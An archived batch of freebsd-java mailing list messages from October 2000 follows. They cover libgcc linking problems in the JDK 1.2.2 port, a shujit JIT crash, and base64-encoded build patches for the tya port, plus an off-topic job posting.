From owner-freebsd-java Sun Oct 29 6:56:37 2000 Delivered-To: freebsd-java@freebsd.org Received: from mail7.nc.rr.com (fe7.southeast.rr.com [24.93.67.54]) by hub.freebsd.org (Postfix) with ESMTP id 227E137B479 for ; Sun, 29 Oct 2000 06:56:35 -0800 (PST) Received: from ipass.net ([24.162.245.52]) by mail7.nc.rr.com with Microsoft SMTPSVC(5.5.1877.357.35); Sun, 29 Oct 2000 09:56:13 -0500 Message-ID: <39FC3AA1.FA3ED9DC@ipass.net> Date: Sun, 29 Oct 2000 09:56:33 -0500 From: "Michael E. Mercer" Reply-To: mmercer@ipass.net X-Mailer: Mozilla 4.75 [en] (X11; U; FreeBSD 4.1.1-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: Max Khon Cc: freebsd-java@FreeBSD.ORG Subject: Re: Problem with appletviewer in jdk1.2.2b10 References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-java@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I understood your answer to the question : is it supposed to be so or not? (yes) to mean it is supposed to be built. With that in context, my question, will it be corrected any time soon? is asking will the build be corrected to compile the shared library of gcc. Also I noticed, it is compiling the *.So object files, just not building the libgcc.so shared library when it is finished compiling the object files. anyways, I am unable to fully test the Java2Demo.jar file, at least the sound part because it can not find the __get_eh_context symbol. later Michael Max Khon wrote: > hi, there! > > On Fri, 27 Oct 2000, Michael E. Mercer wrote: > > > I guess the final question is: Is this going to be corrected any time soon? by > > who? > > what do you want to be corrected? > > > > > >> Now, on CURRENT, shared library libgcc.so is not built! That is, > > > > >> from some point in time it stopped being built, only static libgcc.a > > > > >> is built and installed. But, of course, I had an old libgcc.so.2 > > > > >> hanging around in /usr/lib. And that one doesn't contain the > > > > >> "__get_eh_context" symbol. > > > > > > > > MK> libgcc is not built dynamically on RELENG_4 and RELENG_3 also > > > > > > > > The real question is: is it supposed to be so or not? > > > > > > yes > > /fjoe > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-java" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-java" in the body of the message From owner-freebsd-java Sun Oct 29 7: 3:16 2000 Delivered-To: freebsd-java@freebsd.org Received: from mail7.nc.rr.com (fe7.southeast.rr.com [24.93.67.54]) by hub.freebsd.org (Postfix) with ESMTP id C144E37B479 for ; Sun, 29 Oct 2000 07:03:13 -0800 (PST) Received: from ipass.net ([24.162.245.52]) by mail7.nc.rr.com with Microsoft SMTPSVC(5.5.1877.357.35); Sun, 29 Oct 2000 10:02:52 -0500 Message-ID: <39FC3C30.DB819735@ipass.net> Date: Sun, 29 Oct 2000 10:03:12 -0500 From: "Michael E. Mercer" Reply-To: mmercer@ipass.net X-Mailer: Mozilla 4.75 [en] (X11; U; FreeBSD 4.1.1-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: Alexander Litvin Cc: freebsd-java@FreeBSD.ORG Subject: Re: Problem with appletviewer in jdk1.2.2b10 References: <200010280256.e9S2uT200576@unknown.whichever.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-java@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello, I did aglobal find and the only shared libgcc I found was in the /usr/lib/compat directory. I do not think this is the shared library you are talking about. If I need to submit a PR, then >man send-pr here I come. I thought since this seems to be a known problem, (it was this mailing list who explained it to me) that someone was already looking into it. anyways, let me know to proceed and I will. later Michael Alexander Litvin wrote: > In article <39FA1CDC.25B6316D@ipass.net> you wrote: > > MEM> I guess the final question is: Is this going to be corrected any time soon? by > MEM> who? > > MEM> Thanks > MEM> Michael > > As I understand, you just delete /usr/lib/libgcc.so (that's symlink, > the real library is still there, just in case ;), and rebuild your > jdk1.2.2 :( > > You may submit PR (I would do -- just have no time whatsoever these > days). > > --- > Everyone is a genius. It's just that some people are too stupid to > realize it. > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-java" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-java" in the body of the message From owner-freebsd-java Sun Oct 29 9:10: 7 2000 Delivered-To: freebsd-java@freebsd.org Received: from ns.yogotech.com (ns.yogotech.com [206.127.123.66]) by hub.freebsd.org (Postfix) with ESMTP id 9117E37B479 for ; Sun, 29 Oct 2000 09:10:05 -0800 (PST) Received: from nomad.yogotech.com (nomad.yogotech.com [206.127.123.131]) by ns.yogotech.com (8.9.3/8.9.3) with ESMTP id KAA11437; Sun, 29 Oct 2000 10:08:23 -0700 (MST) (envelope-from nate@nomad.yogotech.com) Received: (from nate@localhost) by nomad.yogotech.com (8.8.8/8.8.8) id KAA04295; Sun, 29 Oct 2000 10:08:20 -0700 (MST) (envelope-from nate) Date: Sun, 29 Oct 2000 10:08:20 -0700 (MST) Message-Id: <200010291708.KAA04295@nomad.yogotech.com> From: Nate Williams MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: mmercer@ipass.net Cc: Max Khon , freebsd-java@FreeBSD.ORG Subject: Re: Problem with appletviewer in jdk1.2.2b10 In-Reply-To: <39FC3AA1.FA3ED9DC@ipass.net> References: <39FC3AA1.FA3ED9DC@ipass.net> X-Mailer: VM 6.34 under 19.16 "Lille" XEmacs Lucid Reply-To: nate@yogotech.com (Nate Williams) Sender: owner-freebsd-java@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > I understood your answer to the question : is it supposed to be so or > not? (yes) to mean it is supposed to be built. With that in context, > my question, will it be corrected any time soon? is asking will the > build be corrected to compile the shared library of gcc. libgcc is *NOT* supposed to be built shared. However, as you point out, the binaries created by gcc are dependant upon these routines, so they should be linked into the final executable. IMO, the problem is in the linker not pulling these routines into the 'driver' binaries, but I don't know how to fix that. In short, this isn't a JDK problem per-se, but a build-tool problem. Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-java" in the body of the message From owner-freebsd-java Sun Oct 29 11:23:49 2000 Delivered-To: freebsd-java@freebsd.org Received: from smtp02.mrf.mail.rcn.net (smtp02.mrf.mail.rcn.net [207.172.4.61]) by hub.freebsd.org (Postfix) with ESMTP id 5EB9C37B479 for ; Sun, 29 Oct 2000 11:23:47 -0800 (PST) Received: from 207-172-201-151.s24.as3.xnb.nj.dialup.rcn.com ([207.172.201.151] helo=unknown.whichever.org) by smtp02.mrf.mail.rcn.net with esmtp (Exim 3.16 #1) id 13py3W-0001oa-00 for freebsd-java@freebsd.org; Sun, 29 Oct 2000 14:23:46 -0500 Received: (from archer@localhost) by unknown.whichever.org (8.11.0/8.9.3) id e9TJNig75321; Sun, 29 Oct 2000 14:23:44 -0500 (EST) (envelope-from archer) Date: Sun, 29 Oct 2000 14:23:44 -0500 (EST) Message-Id: <200010291923.e9TJNig75321@unknown.whichever.org> From: Alexander Litvin To: freebsd-java@freebsd.org Subject: Re: Problem with appletviewer in jdk1.2.2b10 In-Reply-To: <39FC3C30.DB819735@ipass.net> X-Newsgroups: unknown.freebsd.java User-Agent: tin/1.5.6-20000803 ("Dust") (UNIX) (FreeBSD/5.0-CURRENT (i386)) Sender: owner-freebsd-java@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In article <39FC3C30.DB819735@ipass.net> you wrote: MEM> I did aglobal find and the only shared libgcc I found was in the MEM> /usr/lib/compat directory. I do not think this is the shared library MEM> you are talking about. Ok, ldd /usr/local/jdk1.2.2/bin/i386/green_threads/java will tell you which libgcc.so it uses. If it doesn't tell abount libgcc -- it is linked in static then, and your problem is bit different from mine. --- Syntactic sugar causes cancer of the semicolon. -- Epigrams in Programming, ACM SIGPLAN Sept. 1982 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-java" in the body of the message From owner-freebsd-java Sun Oct 29 11:30:27 2000 Delivered-To: freebsd-java@freebsd.org Received: from smtp02.mrf.mail.rcn.net (smtp02.mrf.mail.rcn.net [207.172.4.61]) by hub.freebsd.org (Postfix) with ESMTP id 4234237B479 for ; Sun, 29 Oct 2000 11:30:26 -0800 (PST) Received: from 207-172-201-151.s24.as3.xnb.nj.dialup.rcn.com ([207.172.201.151] helo=unknown.whichever.org) by smtp02.mrf.mail.rcn.net with esmtp (Exim 3.16 #1) id 13py9x-0002QC-00 for freebsd-java@freebsd.org; Sun, 29 Oct 2000 14:30:25 -0500 Received: (from archer@localhost) by unknown.whichever.org (8.11.0/8.9.3) id e9TJUNG75717; Sun, 29 Oct 2000 14:30:23 -0500 (EST) (envelope-from archer) Date: Sun, 29 Oct 2000 14:30:23 -0500 (EST) Message-Id: <200010291930.e9TJUNG75717@unknown.whichever.org> From: Alexander Litvin To: freebsd-java@freebsd.org Subject: Re: Problem with appletviewer in jdk1.2.2b10 In-Reply-To: <200010291708.KAA04295@nomad.yogotech.com> X-Newsgroups: unknown.freebsd.java User-Agent: tin/1.5.6-20000803 ("Dust") (UNIX) (FreeBSD/5.0-CURRENT (i386)) Sender: owner-freebsd-java@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In article <200010291708.KAA04295@nomad.yogotech.com> you wrote: NW> libgcc is *NOT* supposed to be built shared. However, as you point out, NW> the binaries created by gcc are dependant upon these routines, so they NW> should be linked into the final executable. Right. libgcc.a is supposed to be linked in automatically. That is, without -lgcc given to linker. The problem is that our port _has_ -lgcc flag (see e.g. build/freebsd/java/java/GNUmakefile). My guess is that this causes incorrect dynamic leftover libgcc being linked in (dynamic libraries are looked at first). --- After living in New York, you trust nobody, but you believe everything. Just in case. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-java" in the body of the message From owner-freebsd-java Sun Oct 29 21:56:34 2000 Delivered-To: freebsd-java@freebsd.org Received: from earthlink.net (ped-gw.cegep-sorel-tracy.qc.ca [206.167.240.2]) by hub.freebsd.org (Postfix) with SMTP id 5461B37B479 for ; Sun, 29 Oct 2000 21:56:30 -0800 (PST) Message-Id: <96.5FA5FFCE.53E2@earthlink.net> X-Sender: daglowcg@earthlink.net X-Mailer: Mozilla 4.71 [en] (Win98; I) Date: Sun, 29 Oct 2000 21:56:19 -0700 To: gameprogrammer_list_recipients From: Marta Daglow Subject: STORMFRONT JOBS (4cf835b0) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-java@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Right now Stormfront Studios is adding to its staff and looking for people to create Next Gen Games for the X-BOX and PS2. We're looking for an Entry Programmer, AI Programmer, Sr. Programmer, Lead Programmer, Development Director, Sr. 3D Max Artist, 3D Animator and/or Art Director. Interested or know of anyone who may be interested? Please let me know if you can help us out - we need your talent! Thanks, Marta Daglow EMAIL: mdaglow@earthlink.net WEB: www.stormfront.com San Rafael, CA 94903 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-java" in the body of the message From owner-freebsd-java Mon Oct 30 21:48: 9 2000 Delivered-To: freebsd-java@freebsd.org Received: from mail7.nc.rr.com (mail7.southeast.rr.com [24.93.67.54]) by hub.freebsd.org (Postfix) with ESMTP id 4BF8437B4CF for ; Mon, 30 Oct 2000 21:48:06 -0800 (PST) Received: from ipass.net ([24.162.245.52]) by mail7.nc.rr.com with Microsoft SMTPSVC(5.5.1877.537.53); Tue, 31 Oct 2000 00:47:44 -0500 Message-ID: <39FE5D15.A0AEA024@ipass.net> Date: Tue, 31 Oct 2000 00:48:05 -0500 From: "Michael E. Mercer" Reply-To: mmercer@ipass.net X-Mailer: Mozilla 4.75 [en] (X11; U; FreeBSD 4.1.1-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-java@FreeBSD.ORG Subject: I have sound now! Re: Problem with appletviewer in jdk1.2.2b10 References: <200010280256.e9S2uT200576@unknown.whichever.org> <39FC3C30.DB819735@ipass.net> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-java@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello all, I added -lgcc to line 54 (see below) to ./build/freebsd/sun/audio/GNUmakefile, recompiled, installed, and started the Java2Demo.jar, went to MIX tab and yippee, I had sound. Now not all the different sounds worked, but most did, I am very pleased. later Michael Mercer >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>start of code snippet <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< include $(BUILDDIR)/makefiles/Defs.gmk # # make sure we link the math.h with the floor() funciton # ifdef LIBRARY LDLIBS_COMMON += -lc -lgcc endif # These are used below by the AudioEnvironment class. ifdef DEBUG AUDIO_DEBUG=true CFLAGS += -DJNC_DEBUG=1 CXXFLAGS += -DJNC_DEBUG=1 else AUDIO_DEBUG=false endif "GNUmakefile" [readonly] line 54 of 371 --14%-- col 27 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>end of code snippet<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< "Michael E. Mercer" wrote: > Hello, > > I did aglobal find and the only shared libgcc I found was in the > /usr/lib/compat directory. I do not think this is the shared library > you are talking about. > > If I need to submit a PR, then >man send-pr here I come. > I thought since this seems to be a known problem, (it was this mailing list > who explained it to me) that someone was already looking into it. > > anyways, let me know to proceed and I will. > > later > Michael > > Alexander Litvin wrote: > > > In article <39FA1CDC.25B6316D@ipass.net> you wrote: > > > > MEM> I guess the final question is: Is this going to be corrected any time soon? by > > MEM> who? > > > > MEM> Thanks > > MEM> Michael > > > > As I understand, you just delete /usr/lib/libgcc.so (that's symlink, > > the real library is still there, just in case ;), and rebuild your > > jdk1.2.2 :( > > > > You may submit PR (I would do -- just have no time whatsoever these > > days). > > > > --- > > Everyone is a genius. It's just that some people are too stupid to > > realize it. > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-java" in the body of the message > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-java" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-java" in the body of the message From owner-freebsd-java Tue Oct 31 5:36:10 2000 Delivered-To: freebsd-java@freebsd.org Received: from iclub.nsu.ru (iclub.nsu.ru [193.124.222.66]) by hub.freebsd.org (Postfix) with ESMTP id 34E4537B4CF for ; Tue, 31 Oct 2000 05:36:06 -0800 (PST) Received: from localhost (fjoe@localhost) by iclub.nsu.ru (8.9.3/8.9.3) with ESMTP id TAA36436 for ; Tue, 31 Oct 2000 19:35:54 +0600 (NS) (envelope-from fjoe@iclub.nsu.ru) Date: Tue, 31 Oct 2000 19:35:54 +0600 (NS) From: Max Khon To: java@freebsd.org Subject: shujit and jdk12-beta Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-java@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org hi, there! has anyone tried to build shujit with jdk12-beta prot on latest -stable? i've got this when I tried to run JavaORB ots: Signal 11 in FPU control word: 0x127f FPU status word: 0x0020 FPU tag word: 0xffffffff FPU FIP : 0x08296eb1 SS: 002f, CS: 001f, DS: 002f, ES: 002f, FS: 002f, GS: 002f EAX: 00000000, ECX: 0808f400, EDX: 28e7a088, EBX: 280d67c0 ESI: 084fbc00, EDI: 28e786a0 ESP: 2c3f81a0, EBP: 2c3f81c4 EIP: 28094f42 (ESP+4): 084fbc00, (ESP): 28e7a088 (EIP): ff 30 e8 63 e8 fe ff eb 40 90 8b 02 8b 40 04 80 trapno: 0c shujit built with patchset 8 about a half year ago works fine /fjoe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-java" in the body of the message From owner-freebsd-java Tue Oct 31 5:45:14 2000 Delivered-To: freebsd-java@freebsd.org Received: from toyland.drapple.com (toyland.drapple.com [204.200.26.114]) by hub.freebsd.org (Postfix) with ESMTP id E246F37B4C5 for ; Tue, 31 Oct 2000 05:45:11 -0800 (PST) Received: from freebsd.org (bet-su5-23.itg.discovery.com [198.147.13.23]) by toyland.drapple.com (8.9.3/8.9.3) with ESMTP id FAA61477; Tue, 31 Oct 2000 05:43:14 -0800 (PST) (envelope-from patrick@freebsd.org) Message-ID: <39FECC71.3F1FD47D@freebsd.org> Date: Tue, 31 Oct 2000 13:43:13 +0000 From: Patrick Gardella Organization: FreeBSD X-Mailer: Mozilla 4.75 [en] (X11; U; SunOS 5.7 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: Max Khon Cc: java@freebsd.org Subject: Re: shujit and jdk12-beta References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-java@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Max Khon wrote: > > hi, there! > > has anyone tried to build shujit with jdk12-beta prot on latest -stable? > i've got this when I tried to run JavaORB ots: > > Signal 11 > in FPU control word: 0x127f > FPU status word: 0x0020 > FPU tag word: 0xffffffff > FPU FIP : 0x08296eb1 > > SS: 002f, CS: 001f, DS: 002f, ES: 002f, FS: 002f, GS: 002f > EAX: 00000000, ECX: 0808f400, EDX: 28e7a088, EBX: 280d67c0 > ESI: 084fbc00, EDI: 28e786a0 > ESP: 2c3f81a0, EBP: 2c3f81c4 EIP: 28094f42 > (ESP+4): 084fbc00, (ESP): 28e7a088 > (EIP): ff 30 e8 63 e8 fe ff eb 40 90 8b 02 8b 40 04 80 > trapno: 0c > > shujit built with patchset 8 about a half year ago works fine Is this the only place it crashes? Meaning: Does it run correctly everywhere else? If it dies everywhere, you may want to rebuild it from scratch (I have accidentally tried to use a shuJIT compiled against 1.1.8 on 1.2.2, and it didn't work...surprise, surprise.) Directions are availible on: http://web.inter.nl.net/users/kjkoster/java/content/howto.html#hd03 Patrick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-java" in the body of the message From owner-freebsd-java Tue Oct 31 6:22:23 2000 Delivered-To: freebsd-java@freebsd.org Received: from iclub.nsu.ru (iclub.nsu.ru [193.124.222.66]) by hub.freebsd.org (Postfix) with ESMTP id 3A84A37B4C5; Tue, 31 Oct 2000 06:22:19 -0800 (PST) Received: from localhost (fjoe@localhost) by iclub.nsu.ru (8.9.3/8.9.3) with ESMTP id UAA38368; Tue, 31 Oct 2000 20:22:09 +0600 (NS) (envelope-from fjoe@iclub.nsu.ru) Date: Tue, 31 Oct 2000 20:22:09 +0600 (NS) From: Max Khon To: Patrick Gardella Cc: java@freebsd.org Subject: Re: shujit and jdk12-beta In-Reply-To: <39FECC71.3F1FD47D@freebsd.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-java@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org hi, there! On Tue, 31 Oct 2000, Patrick Gardella wrote: > > has anyone tried to build shujit with jdk12-beta prot on latest -stable? > > i've got this when I tried to run JavaORB ots: > > > > Signal 11 > > in FPU control word: 0x127f > > FPU status word: 0x0020 > > FPU tag word: 0xffffffff > > FPU FIP : 0x08296eb1 > > > > SS: 002f, CS: 001f, DS: 002f, ES: 002f, FS: 002f, GS: 002f > > EAX: 00000000, ECX: 0808f400, EDX: 28e7a088, EBX: 280d67c0 > > ESI: 084fbc00, EDI: 28e786a0 > > ESP: 2c3f81a0, EBP: 2c3f81c4 EIP: 28094f42 > > (ESP+4): 084fbc00, (ESP): 28e7a088 > > (EIP): ff 30 e8 63 e8 fe ff eb 40 90 8b 02 8b 40 04 80 > > trapno: 0c > > > > shujit built with patchset 8 about a half year ago works fine > > Is this the only place it crashes? Meaning: Does it run correctly > everywhere else? hello world example works fine I've got some other strange errors when I try to run more complex applications (e.g. examples/WithResource/BankServer from JavaORB CosOTS distribution) everything works fine without shujit /fjoe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-java" in the body of the message From owner-freebsd-java Tue Oct 31 7:17: 1 2000 Delivered-To: freebsd-java@freebsd.org Received: from iclub.nsu.ru (iclub.nsu.ru [193.124.222.66]) by hub.freebsd.org (Postfix) with ESMTP id 7CE7337B479; Tue, 31 Oct 2000 07:16:47 -0800 (PST) Received: from localhost (fjoe@localhost) by iclub.nsu.ru (8.9.3/8.9.3) with ESMTP id VAA40171; Tue, 31 Oct 2000 21:16:39 +0600 (NS) (envelope-from fjoe@iclub.nsu.ru) Date: Tue, 31 Oct 2000 21:16:38 +0600 (NS) From: Max Khon To: sobomax@freebsd.org Cc: java@freebsd.org Subject: /usr/ports/java/tya Message-ID: MIME-Version: 1.0 Content-Type: MULTIPART/MIXED; BOUNDARY="0-1040770004-973005398=:40042" Sender: owner-freebsd-java@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mime@docserver.cac.washington.edu for more info. --0-1040770004-973005398=:40042 Content-Type: TEXT/PLAIN; charset=US-ASCII hi, there! with attached patches it is possible to build /usr/ports/java/tya with jdk12-beta (you will also need to change JAVADIR= in Makefile) I have verified that it is still possible to build tya with jdk1.1.8 with this patches. tya works for me with jdk12-beta /fjoe --0-1040770004-973005398=:40042 Content-Type: TEXT/PLAIN; charset=US-ASCII; name=patch-ab Content-Transfer-Encoding: BASE64 Content-ID: Content-Description: Content-Disposition: attachment; filename=patch-ab LS0tIE1ha2VmaWxlLmluLm9yaWcJTW9uIERlYyAyMCAyMjo1Nzo1OCAxOTk5 DQorKysgTWFrZWZpbGUuaW4JVHVlIE9jdCAzMSAyMDozOTozNyAyMDAwDQpA QCAtMTIsMTIgKzEyLDEyIEBADQogI1RBUkdFVEZMQUdTID0tRERFQlVHDQog DQogIyBHQ0Mgc3BlY2lmaWMgb3B0aW9uczoNCi1DT1BURkxBR1M9LU8zDQor I0NPUFRGTEFHUz0tTzMNCiAjQ09QVEZMQUdTPS1PNiAtdg0KIA0KIA0KICMg Q1BVIHNwZWNpZmljIG9wdGlvbnM6DQotUE9QVEZMQUdTPS1tNDg2IC1tYWxp Z24tbG9vcHM9NCAtbWFsaWduLWZ1bmN0aW9ucz00IC1tYWxpZ24tanVtcHM9 NA0KK1BPUFRGTEFHUz0tbWFsaWduLWxvb3BzPTQgLW1hbGlnbi1mdW5jdGlv bnM9NCAtbWFsaWduLWp1bXBzPTQNCiANCiANCiAjX19fX19fX19fX19fX19f X19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19f Xw0KQEAgLTI1LDE0ICsyNSwxNSBAQA0KIEpBVkFJTkNMRElSPS1JJChKQVZB QklORElSKS8uLi9pbmNsdWRlIC1JJChKQVZBQklORElSKS8uLi9pbmNsdWRl L2dlbnVuaXggXA0KIAktSSQoSkFWQUJJTkRJUikvLi4vaW5jbHVkZS9mcmVl YnNkIFwNCiAJLUkkKEpBVkFCSU5ESVIpLy4uL2luY2x1ZGUvbGludXggXA0K LQktSSQoSkFWQUJJTkRJUikvLi4vaW5jbHVkZS1vbGQgLUkkKEpBVkFCSU5E SVIpLy4uL2luY2x1ZGUtb2xkL2xpbnV4DQorCS1JJChKQVZBQklORElSKS8u Li9pbmNsdWRlLW9sZCAtSSQoSkFWQUJJTkRJUikvLi4vaW5jbHVkZS1vbGQv bGludXggXA0KKwktSSQoSkFWQUJJTkRJUikvLi4vaW5jbHVkZS1vbGQvZnJl ZWJzZA0KIA0KIA0KIFRBUkdFVD1saWJ0eWEuc28NCiBDU09VUkNFUz10eWEu YyB0eWFyZWNoZWxwLmMgdHlhcmVjb2RlLmMgdHlhdXRpbC5jIHR5YXJ1bnRp bWUuYyB0eWFleGMuYw0KIA0KICMNCi1DRkxBR1MgPSAtV2FsbCAtcGlwZSAt c2hhcmVkICQoQ09QVEZMQUdTKSAkKFBPUFRGTEFHUykJJChUQVJHRVRGTEFH UykNCitDRkxBR1MgKz0gLVdhbGwgLXNoYXJlZCAkKENPUFRGTEFHUykgJChQ T1BURkxBR1MpCSQoVEFSR0VURkxBR1MpDQogDQogYWxsOiAkKFRBUkdFVCkN CiANCg== --0-1040770004-973005398=:40042 Content-Type: TEXT/PLAIN; charset=US-ASCII; name=patch-ad Content-Transfer-Encoding: BASE64 Content-ID: Content-Description: Content-Disposition: attachment; filename=patch-ad LS0tIGNvbmZpZ3VyZS5vcmlnCVR1ZSBPY3QgMzEgMjA6NDA6NTkgMjAwMA0K KysrIGNvbmZpZ3VyZQlUdWUgT2N0IDMxIDIwOjUwOjUzIDIwMDANCkBAIC04 NjIsMTcgKzg2MiwxMSBAQA0KIGp2ZXJzaW9uPWAkamF2YWJpbiAtZ3JlZW4g LURqYXZhLmNvbXBpbGVyPU5PTkUgLXZlcnNpb24gMj4mMWANCiBvcz1gdW5h bWUgLXMgMj4vZGV2L251bGxgDQogaWYgdGVzdCAiJG9zIiA9ICJGcmVlQlNE IiA7IHRoZW4NCi0JZWNobyAiJGFjX3QiInJlY29nbml6ZWQ6IEZyZWVCU0Qg SmF2YSAxLjEueCBwb3J0IiAxPiY2DQotCWNhdCA+PiBjb25mZGVmcy5oIDw8 XEVPRg0KLSNkZWZpbmUgSkRLMTE3IDENCi1FT0YNCi0NCiAJY2F0ID4+IGNv bmZkZWZzLmggPDxcRU9GDQogI2RlZmluZSBGUkVFQlNEIDENCiBFT0YNCitm aQ0KIA0KLQlqb3B0X2xpYmRpcj0uLi9saWIvaTM4Ni9ncmVlbl90aHJlYWRz DQotZWxzZQ0KIAljYXNlICIkanZlcnNpb24iIGluDQogCQlqYXZhKjEuMS42 KikNCiAJCQllY2hvICIkYWNfdCIicmVjb2duaXplZDogQnlybmUgMS4xLjYt dlgiIDE+JjYNCkBAIC04OTEsMTIgKzg4NSwxNiBAQA0KIAkJCWpvcHRfbGli ZGlyPS4uL2xpYi9pNTg2L2dyZWVuX3RocmVhZHMNCiAJCQk7Ow0KIAkJamF2 YSoxLjEuOCopDQotCQkJZWNobyAiJGFjX3QiInJlY29nbml6ZWQ6IEJsYWNr ZG93biAxLjEuOC12MSIgMT4mNg0KIAkJCWNhdCA+PiBjb25mZGVmcy5oIDw8 XEVPRg0KICNkZWZpbmUgSkRLMTE3IDENCiBFT0YNCi0NCi0JCQlqb3B0X2xp YmRpcj0uLi9saWIvaTU4Ni9ncmVlbl90aHJlYWRzDQorCQkJaWYgdGVzdCAi JG9zIiA9ICJGcmVlQlNEIiA7IHRoZW4NCisJCQkJZWNobyAiJGFjX3QiInJl Y29nbml6ZWQ6IEZyZWVCU0QgMS4xLjggcG9ydCIgMT4mNg0KKwkJCQlqb3B0 X2xpYmRpcj0uLi9saWIvaTM4Ni9ncmVlbl90aHJlYWRzDQorCQkJZWxzZQ0K KwkJCQllY2hvICIkYWNfdCIicmVjb2duaXplZDogQmxhY2tkb3duIDEuMS44 LXYxIiAxPiY2DQorCQkJCWpvcHRfbGliZGlyPS4uL2xpYi9pNTg2L2dyZWVu X3RocmVhZHMNCisJCQlmaQ0KIAkJCTs7CQkJDQogCQlqYXZhKjEuMiopDQog CQkJZWNobyAiJGFjX3QiInJlY29nbml6ZWQ6IEpESzEuMi12WCIgMT4mNg0K QEAgLTkyNSw3ICs5MjMsNiBAQA0KIA0KIAkJCTs7DQogCWVzYWMNCi1maQ0K IA0KIGVjaG8gJGFjX24gImNoZWNraW5nIGZvciBuYW1lIG9mIHNpZ2NvbnRl eHQgc3RydWN0IiIuLi4gJGFjX2MiIDE+JjYNCiBlY2hvICJjb25maWd1cmU6 OTMyOiBjaGVja2luZyBmb3IgbmFtZSBvZiBzaWdjb250ZXh0IHN0cnVjdCIg PiY1DQo= --0-1040770004-973005398=:40042-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-java" in the body of the message From owner-freebsd-java Tue Oct 31 7:24:10 2000 Delivered-To: freebsd-java@freebsd.org Received: from blizzard.sabbo.net.blizzard.sabbo.net (blizzard.sabbo.net [193.193.218.18]) by hub.freebsd.org (Postfix) with ESMTP id 023A537B4C5 for ; Tue, 31 Oct 2000 07:24:05 -0800 (PST) Received: from vic.sabbo.net (root@vic.sabbo.net [193.193.218.109]) by blizzard.sabbo.net.blizzard.sabbo.net (8.10.1/8.10.1) with ESMTP id e9VGPfV13677; Tue, 31 Oct 2000 18:25:50 +0200 Received: from FreeBSD.org (big_brother.vega.com [192.168.1.1]) by vic.sabbo.net (8.11.0/8.9.3) with ESMTP id e9VFNnM26695; Tue, 31 Oct 2000 17:23:49 +0200 (EET) (envelope-from sobomax@FreeBSD.org) Message-ID: <39FEE3FD.E5391075@FreeBSD.org> Date: Tue, 31 Oct 2000 17:23:42 +0200 From: Maxim Sobolev Organization: Vega International Capital X-Mailer: Mozilla 4.76 [en] (WinNT; U) X-Accept-Language: uk,ru,en MIME-Version: 1.0 To: Max Khon Cc: java@FreeBSD.org Subject: Re: /usr/ports/java/tya References: Content-Type: text/plain; charset=x-user-defined Content-Transfer-Encoding: 7bit Sender: owner-freebsd-java@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Max Khon wrote: > hi, there! > > with attached patches it is possible to build /usr/ports/java/tya > with jdk12-beta > (you will also need to change JAVADIR= in Makefile) > I have verified that it is still possible to build tya with jdk1.1.8 > with this patches. > > tya works for me with jdk12-beta The main problem with using JITs with JDK12 is that virtual machine doesn't anymore allow installing JIT into place other than ${LOCALBASE}/jdk1.2.2 (i.e. it doesn't respect LD_LIBRARY_PATH like 1.1.8 does), so it's nearly impossible to adjust port to correctly install/deinstall on both jdk/jre 1.1.8 and jdk 1.2.2. However if you have any ideas of how to cope with this particular problem please let me know. -Maxim To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-java" in the body of the message From owner-freebsd-java Tue Oct 31 7:35:18 2000 Delivered-To: freebsd-java@freebsd.org Received: from 